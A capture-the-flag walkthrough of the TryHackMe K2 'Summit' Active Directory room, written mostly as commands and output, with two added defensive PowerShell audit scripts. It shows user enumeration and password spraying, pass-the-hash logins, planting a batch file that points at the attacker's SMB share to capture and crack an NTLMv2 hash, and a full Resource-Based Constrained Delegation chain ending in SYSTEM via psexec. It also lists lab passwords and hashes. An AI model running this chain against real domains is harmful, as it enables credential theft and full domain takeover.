Overview
TryHackMe K2: Part 3 – Summit is the final room in the K2 Active Directory attack chain where the objective is to escalate privileges from a low-privileged domain user to full Domain Administrator access. This room focuses heavily on Active Directory enumeration, abusing weak permissions, capturing NTLM hashes, BloodHound analysis, and finally exploiting Resource-Based Constrained Delegation (RBCD) for privilege escalation.
This walkthrough covers the complete attack path from initial access to obtaining SYSTEM privileges on the Domain Controller.
Enumeration
The first step was running an Nmap scan against the target.
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
9389/tcp open adws
49668/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49680/tcp open unknown
49684/tcp open unknown
49715/tcp open unknown
49794/tcp open unknown
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-13 17:22:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-04-13T17:23:44+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: K2
| NetBIOS_Domain_Name: K2
| NetBIOS_Computer_Name: K2ROOTDC
| DNS_Domain_Name: k2.thm
| DNS_Computer_Name: K2RootDC.k2.thm
| DNS_Tree_Name: k2.thm
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-13T17:23:05+00:00
| ssl-cert: Subject: commonName=K2RootDC.k2.thm
| Not valid before: 2025-04-12T17:15:47
|_Not valid after: 2025-10-12T17:15:47
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: K2ROOTDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-13T17:23:08
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 196.76 ms 10.14.0.1
2 197.26 ms 10.10.21.9
The scan revealed several Active Directory related services:
- Kerberos (88)
- LDAP (389)
- SMB (445)
- WinRM (5985)
- RDP (3389)
- Global Catalog LDAP (3268)
Important information gathered:
- Hostname: K2RootDC
- Domain: k2.thm
- Operating System: Windows Server 2019
The computer name is K2RootDC.k2.thm, so let's add it to the /etc/hosts file.
Users and Passwords from the previous machines
Users
j.bold
r.bud
j.smith
administrator
Passwords
Pwd@9tLNrC3!
RdzQ7MSKt)fNaz3!
vRMkaVgdfxhW!8
#8rockyou
AlenBenedict123
Technique – to make a program run anywhere in the OS
There are two ways to make a program runnable from anywhere: the first is to add the directory that contains the binary to the PATH variable (export PATH="$PATH:/path/to/dir"), and the second is to move the binary into one of the directories already listed in PATH.
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ echo $PATH
/home/alen/.local/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/home/alen/.dotnet/tools
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ sudo mv kerbrute /usr/local/bin
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ cd ..
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute
Username Enumeration
Using usernames collected from previous K2 rooms:
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute userenum --dc k2rootdc.k2.thm -d k2.thm users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/13/25 - Ronnie Flathers @ropnop
2025/04/13 21:44:02 > Using KDC(s):
2025/04/13 21:44:02 > k2rootdc.k2.thm:88
2025/04/13 21:44:02 > [+] VALID USERNAME: j.smith@k2.thm
2025/04/13 21:44:02 > [+] VALID USERNAME: administrator@k2.thm
2025/04/13 21:44:02 > Done! Tested 4 usernames (2 valid) in 0.248 seconds
Brute-forcing the collected passwords against the valid users
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute bruteuser --dc k2rootdc.k2.thm -d k2.thm passwords.txt j.smith
Version: v1.0.3 (9dad6e1) - 04/13/25 - Ronnie Flathers @ropnop
2025/04/13 21:45:41 > Using KDC(s):
2025/04/13 21:45:41 > k2rootdc.k2.thm:88
2025/04/13 21:45:42 > Done! Tested 5 logins (0 successes) in 0.642 seconds
┌──(alen㉿kali)-[~/Downloads]
└─$ kerbrute bruteuser --dc k2rootdc.k2.thm -d k2.thm passwords.txt administrator
Version: v1.0.3 (9dad6e1) - 04/13/25 - Ronnie Flathers @ropnop
2025/04/13 21:45:50 > Using KDC(s):
2025/04/13 21:45:50 > k2rootdc.k2.thm:88
2025/04/13 21:45:51 > Done! Tested 5 logins (0 successes) in 0.724 seconds
The previous room asked for the Administrator's NTLM hash, which might be a hint that the hash is meant to be used in this room.
┌──(alen㉿kali)-[~/Downloads]
└─$ evil-winrm -u j.smith -H 9545b61858c043477c350ae86c37b32f -i k2rootdc.k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.smith\Documents>
We now have a shell as j.smith; next we enumerate the system.
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/13/2025 5:26 PM Administrator
d----- 5/30/2023 2:29 AM j.smith
d----- 5/30/2023 1:31 AM o.armstrong
d-r--- 12/12/2018 7:45 AM Public
This shows the user profiles on the machine: Administrator, j.smith and o.armstrong.
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/14/2018 6:56 AM EFI
d----- 5/13/2020 5:58 PM PerfLogs
d-r--- 11/14/2018 4:10 PM Program Files
d----- 3/11/2021 7:29 AM Program Files (x86)
d----- 5/30/2023 1:32 AM Scripts
d-r--- 5/30/2023 2:29 AM Users
d----- 5/30/2023 1:17 AM Windows
At the root of the filesystem there is a folder called Scripts.
*Evil-WinRM* PS C:\> cd Scripts
*Evil-WinRM* PS C:\Scripts> dir
Directory: C:\Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2023 1:32 AM 92 backup.bat
*Evil-WinRM* PS C:\Scripts> type backup.bat
copy C:\Users\o.armstrong\Desktop\notes.txt C:\Users\o.armstrong\Documents\backup_notes.txt
It is a one-line batch script that copies notes.txt from o.armstrong's Desktop to o.armstrong's Documents folder.
*Evil-WinRM* PS C:\> Get-Acl -Path C:\Scripts
Directory: C:\
Path Owner Access
---- ----- ------
Scripts BUILTIN\Administrators K2\j.smith Allow FullControl...
*Evil-WinRM* PS C:\> Get-Acl -Path C:\Scripts\backup.bat
Directory: C:\Scripts
Path Owner Access
---- ----- ------
backup.bat K2\o.armstrong NT AUTHORITY\SYSTEM Allow FullControl...
*Evil-WinRM* PS C:\>
Looking at the permissions, j.smith has Full Control on the Scripts folder but not on backup.bat itself, which is owned by o.armstrong.
Full Control on a directory includes the right to delete its children, so we can delete backup.bat and replace it with our own script that references a UNC path on our machine, with Responder listening there to capture the NTLMv2 hash of the account that runs the script.
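A defender can find this kind of mismatch before it is abused. The following PowerShell is an added example, not code from the room or this walkthrough: it lists directories under a root where a principal outside an assumed trusted set holds write or delete rights while script files inside are owned by a different account (the C:\Scripts / backup.bat situation). The root path, the trusted-principal list and the extension list are assumptions.

```powershell
# Added example (not from the walkthrough): audit script directories for the weakness used above,
# a directory that a low-privileged principal can write/delete in while the scripts inside are
# owned by (and run as) someone else. Root path and trusted-principal list are assumptions.
function Find-ScriptDirMismatch {
    param(
        [string]$Root = 'C:\Scripts',
        [string[]]$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER'),
        [string[]]$ScriptExtensions = @('.bat', '.cmd', '.ps1', '.vbs')
    )
    # Any of these rights on a directory lets the holder replace or delete its children, whatever
    # the ACL on the individual files says (Full Control on C:\Scripts was enough above).
    $dirWrite = [System.Security.AccessControl.FileSystemRights]'CreateFiles, Delete, DeleteSubdirectoriesAndFiles, TakeOwnership, ChangePermissions'

    $dirs = @(Get-Item -Path $Root) + @(Get-ChildItem -Path $Root -Directory -Recurse -ErrorAction SilentlyContinue)
    foreach ($dir in $dirs) {
        $acl = Get-Acl -Path $dir.FullName
        $writers = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $TrustedPrincipals -notcontains $_.IdentityReference.Value -and
            ($_.FileSystemRights -band $dirWrite) -ne 0
        }
        if (-not $writers) { continue }

        $scripts = Get-ChildItem -Path $dir.FullName -File -ErrorAction SilentlyContinue |
            Where-Object { $ScriptExtensions -contains $_.Extension.ToLower() }
        foreach ($script in $scripts) {
            $owner = (Get-Acl -Path $script.FullName).Owner
            foreach ($w in $writers) {
                # A writer who is not the owner can delete and re-create the script with their own
                # content; whoever runs it afterwards (a task, another user) executes the replacement.
                if ($w.IdentityReference.Value -ne $owner) {
                    [PSCustomObject]@{
                        Directory = $dir.FullName
                        Writer    = $w.IdentityReference.Value
                        Rights    = $w.FileSystemRights
                        Script    = $script.Name
                        Owner     = $owner
                    }
                }
            }
        }
    }
}

# Fix for each finding: remove the writer's rights on the directory, or grant read/execute only.
Find-ScriptDirMismatch | Format-Table -AutoSize
```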
In the victim machine
*Evil-WinRM* PS C:\> cd Scripts
*Evil-WinRM* PS C:\Scripts> rm backup.bat
*Evil-WinRM* PS C:\Scripts> Set-Content -Path "C:\Scripts\backup.bat" -Value "copy \\10.14.100.15\pwned.txt C:\Users\o.armstrong\Documents\pwned.txt"
*Evil-WinRM* PS C:\Scripts> dir
Directory: C:\Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/14/2025 2:22 PM 72 backup.bat
*Evil-WinRM* PS C:\Scripts> type backup.bat
copy \\10.14.100.15\pwned.txt C:\Users\o.armstrong\Documents\pwned.txt
*Evil-WinRM* PS C:\Scripts>
In the Attacker Machine
┌──(alen㉿kali)-[~/Downloads]
└─$ sudo responder -I tun0
[sudo] password for alen:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.10.27
[SMB] NTLMv2-SSP Username : K2\o.armstrong
[SMB] NTLMv2-SSP Hash : o.armstrong::K2:0f10478086abe3a...
[*] Skipping previously captured hash for K2\o.armstrong
[+] Exiting...
We have the NetNTLMv2 hash; now we crack it with hashcat.
┌──(alen㉿kali)-[~/Downloads]
└─$ hashcat armstrong-hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
O.ARMSTRONG::K2:0f10478086abe3a8:81c7397b390d47385b7d41605ac6ac83:...:arMStronG08
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: O.ARMSTRONG::K2:0f10478086abe3a8:81c7397b390d47385b...000000
Time.Started.....: Mon Apr 14 18:24:02 2025 (11 secs)
Time.Estimated...: Mon Apr 14 18:24:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 935.8 kH/s (0.58ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10020864/14344385 (69.86%)
Rejected.........: 0/10020864 (0.00%)
Restore.Point....: 10019840/14344385 (69.85%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
The password for o.armstrong is arMStronG08.
We can use these credentials to collect domain data for BloodHound.
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ ls
ad-bloodhound.sh
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ ./ad-bloodhound.sh
Domain:
k2.thm
Username:
o.armstrong
Password:
arMStronG08
IP of Domain:
10.10.10.27
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: k2.thm
INFO: Getting TGT for user
INFO: Connecting to LDAP server: k2rootdc.k2.thm
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: k2rootdc.k2.thm
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: K2RootDC.k2.thm
INFO: Done in 00M 31S
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ ls
20250414183248_computers.json 20250414183248_domains.json 20250414183248_groups.json 20250414183248_users.json
20250414183248_containers.json 20250414183248_gpos.json 20250414183248_ous.json ad-bloodhound.sh
Now upload these files to BloodHound: start the neo4j console first, then start BloodHound and import the JSON files.

We can use evil-winrm to log in as o.armstrong.
┌──(alen㉿kali)-[~/Downloads]
└─$ evil-winrm -u o.armstrong -p arMStronG08 -i k2rootdc.k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\o.armstrong\Documents> dir
Directory: C:\Users\o.armstrong\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2023 1:35 AM 136 backup_notes.txt
*Evil-WinRM* PS C:\Users\o.armstrong\Documents> type backup_notes.txt
Things to check:
1. Check on the IT Website hosted on the Linux Server. Is it vulnerable?
2. Enforce the password policy on everyone!
*Evil-WinRM* PS C:\Users\o.armstrong\Documents> cd ..
*Evil-WinRM* PS C:\Users\o.armstrong> cd Desktop
*Evil-WinRM* PS C:\Users\o.armstrong\Desktop> dir
Directory: C:\Users\o.armstrong\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 5/30/2023 1:35 AM 136 notes.txt
-a---- 5/30/2023 2:28 AM 38 user.txt
*Evil-WinRM* PS C:\Users\o.armstrong\Desktop>
Checking Privilege Escalation Vectors in Windows
*Evil-WinRM* PS C:\Users\o.armstrong\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\o.armstrong\Desktop> net user o.armstrong /domain
User name o.armstrong
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/30/2023 1:23:21 AM
Password expires Never
Password changeable 5/31/2023 1:23:21 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/14/2025 4:29:00 PM
Logon hours allowed All
Local Group Memberships *IT Director *Performance Log Users
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\o.armstrong\Desktop>
o.armstrong is a member of the IT Director group, which we can also confirm in BloodHound.
Searching for o.armstrong and clicking on direct members shows that the account is a member of IT Director.

Searching for IT Director and clicking on First Degree Object Control shows that the group has GenericWrite on the DC computer object.

Clicking the ? icon on that edge opens the help panel, whose Linux Abuse section describes how this right is abused.


Since GenericWrite on the DC computer object lets the IT Director group write the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, we will perform a Resource-Based Constrained Delegation (RBCD) attack: add a computer account we control, grant it delegation rights to the DC, and then request a service ticket impersonating administrator.
RBCD First Step – Add Computer
┌──(alen㉿kali)-[~/Downloads]
└─$ locate addcomputer
/usr/bin/impacket-addcomputer
/usr/share/doc/python3-impacket/examples/addcomputer.py
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -method LDAPS -computer-name 'ALENBENEDICT$' -computer-pass 'AlenBenedict123' -dc-host k2rootdc.k2.thm -domain-netbios k2.thm 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] socket ssl wrapping error: [Errno 104] Connection reset by peer
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -method ghcghc -computer-name 'ALENBENEDICT$' -computer-pass 'AlenBenedict123' -dc-host k2rootdc.k2.thm -domain-netbios k2.thm 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
usage: addcomputer.py [-h] [-domain-netbios NETBIOSNAME] [-computer-name COMPUTER-NAME$] [-computer-pass password] [-no-add] [-delete] [-debug]
[-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH]
[-no-pass] [-k] [-aesKey hex key] [-dc-host hostname] [-dc-ip ip]
[domain/]username[:password]
addcomputer.py: error: argument -method: invalid choice: 'ghcghc' (choose from SAMR, LDAPS)
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -method SAMR -computer-name 'ALENBENEDICT$' -computer-pass 'AlenBenedict123' -dc-host k2rootdc.k2.thm -domain-netbios k2.thm 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account ALENBENEDICT$ with password AlenBenedict123.
RBCD Second Step – rbcd.py
┌──(alen㉿kali)-[~/Downloads]
└─$ locate rbcd
/usr/bin/impacket-rbcd
/usr/share/doc/metasploit-framework/modules/auxiliary/admin/ldap/rbcd.md
/usr/share/doc/python3-impacket/examples/rbcd.py
/usr/share/metasploit-framework/modules/auxiliary/admin/ldap/rbcd.rb
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/rbcd.py -delegate-from 'ALENBENEDICT$' -delegate-to 'K2ROOTDC$' -action 'write' 'k2.thm/o.armstrong:arMStronG08'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ALENBENEDICT$ can now impersonate users on K2ROOTDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ALENBENEDICT$ (S-1-5-21-1966530601-3185510712-10604624-1116)
RBCD Third Step – getST.py
┌──(alen㉿kali)-[~/Downloads]
└─$ python3 /usr/share/doc/python3-impacket/examples/getST.py -spn 'cifs/k2rootdc.k2.thm' -impersonate 'administrator' 'k2.thm/ALENBENEDICT:AlenBenedict123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_k2rootdc.k2.thm@K2.THM.ccache
RBCD Fourth Step – Pass the Ticket
┌──(alen㉿kali)-[~/Downloads]
└─$ mv administrator@cifs_k2rootdc.k2.thm@K2.THM.ccache k2thesummit
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ export KRB5CCNAME=administrator@cifs_k2rootdc.k2.thm@K2.THM.ccache
┌──(alen㉿kali)-[~/Downloads/k2thesummit]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py -k 'k2.thm/administrator@k2rootdc.k2.thm'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on k2rootdc.k2.thm.....
[*] Found writable share ADMIN$
[*] Uploading file uRHirXJS.exe
[*] Opening SVCManager on k2rootdc.k2.thm.....
[*] Creating service Kwpb on k2rootdc.k2.thm.....
[*] Starting service Kwpb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4377]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd ../..
C:\> cd Users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users
05/30/2023 02:29 AM <DIR> .
05/30/2023 02:29 AM <DIR> ..
04/14/2025 02:04 PM <DIR> Administrator
05/30/2023 02:29 AM <DIR> j.smith
05/30/2023 01:31 AM <DIR> o.armstrong
12/12/2018 07:45 AM <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 13,151,580,160 bytes free
C:\Users> cd Administrator
C:\Users\Administrator> cd Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\Administrator\Desktop
05/30/2023 02:28 AM <DIR> .
05/30/2023 02:28 AM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
05/30/2023 02:28 AM 37 root.txt
3 File(s) 1,118 bytes
2 Dir(s) 13,151,449,088 bytes free
C:\Users\Administrator\Desktop>
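The following PowerShell is an added example, not part of the room or this walkthrough, written from the defender's side: it audits the three conditions the RBCD chain above depends on (a non-zero ms-DS-MachineAccountQuota, write rights on the DC computer object, and existing RBCD entries on any computer). It assumes the RSAT ActiveDirectory module on a domain-joined host; the domain and DC names default to the room's values and are parameters.

```powershell
# Added example (not from the walkthrough): audit the settings the RBCD chain above relies on.
# Assumes the RSAT ActiveDirectory module; the domain/DC defaults are the room's values.
Import-Module ActiveDirectory

function Get-RbcdExposure {
    param(
        [string]$Domain = 'k2.thm',
        [string]$DcName = 'K2ROOTDC'
    )
    $domainDn = (Get-ADDomain -Identity $Domain).DistinguishedName
    # Principals expected to hold write rights on a DC object; anything else is reported.
    $expected = '^(NT AUTHORITY\\(SYSTEM|SELF)|BUILTIN\\Administrators|.*\\(Domain Admins|Enterprise Admins|Domain Controllers|Enterprise Domain Controllers))$'

    # 1. ms-DS-MachineAccountQuota: a non-zero value lets any domain user create machine accounts
    #    (the addcomputer.py step). Setting it to 0 removes that first step.
    $quota = (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    [PSCustomObject]@{
        Check  = 'MachineAccountQuota'; Object = $domainDn; Detail = $quota
        Status = $(if ($quota -gt 0) { 'any user can add computers' } else { 'ok' })
    }

    # 2. Write rights on the DC computer object (the GenericWrite BloodHound showed for IT Director).
    #    Holders can set msDS-AllowedToActOnBehalfOfOtherIdentity on it (the rbcd.py step).
    $dc  = Get-ADComputer -Identity $DcName
    $acl = Get-Acl -Path ('AD:\' + $dc.DistinguishedName)
    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -notmatch $expected -and
            ($_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner' -or
             ($_.ActiveDirectoryRights -match 'WriteProperty' -and $_.ObjectType -eq [guid]::Empty))
        } |
        ForEach-Object {
            [PSCustomObject]@{
                Check  = 'WriteOnDC'; Object = $dc.Name
                Detail = "$($_.IdentityReference.Value): $($_.ActiveDirectoryRights)"; Status = 'review'
            }
        }

    # 3. Existing RBCD entries. PrincipalsAllowedToDelegateToAccount is the decoded form of
    #    msDS-AllowedToActOnBehalfOfOtherIdentity; on a DC any entry is suspicious (ALENBENEDICT$ above).
    Get-ADComputer -Filter * -Properties PrincipalsAllowedToDelegateToAccount |
        Where-Object { $_.PrincipalsAllowedToDelegateToAccount } |
        ForEach-Object {
            [PSCustomObject]@{
                Check  = 'RBCD'; Object = $_.Name
                Detail = ($_.PrincipalsAllowedToDelegateToAccount -join '; ')
                Status = 'review; clear with Set-ADComputer <name> -PrincipalsAllowedToDelegateToAccount $null'
            }
        }
}

Get-RbcdExposure | Format-Table -AutoSize -Wrap
```

Run it as a domain administrator; each row is a finding to remediate or to document as intentional.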